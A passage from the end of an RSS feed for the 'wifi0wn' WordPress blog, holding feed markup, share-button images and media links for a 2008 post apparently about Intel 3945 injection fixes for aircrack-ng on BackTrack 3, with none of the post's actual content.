<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/20/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/20/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/20/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=20&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/06/intel-3945-injection-fixes-for-aircrack-ng-bt3/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="/DOCUME~1/THUNDE~1/LOCALS~1/Temp/moz-screenshot.jpg" medium="image" />

		<media:content url="http://forums.remote-exploit.org/attachment.php?attachmentid=246&#38;stc=1&#38;d=1203513656" medium="image" />

		<media:content url="http://forums.remote-exploit.org/attachment.php?attachmentid=247&#38;stc=1&#38;d=1203513802" medium="image" />

		<media:content url="http://forums.remote-exploit.org/attachment.php?attachmentid=248&#38;d=1203513835" medium="image" />

		<media:content url="http://forums.remote-exploit.org/attachment.php?attachmentid=249&#38;stc=1&#38;d=1203552637" medium="image" />
	</item>
	</channel>
</rss>
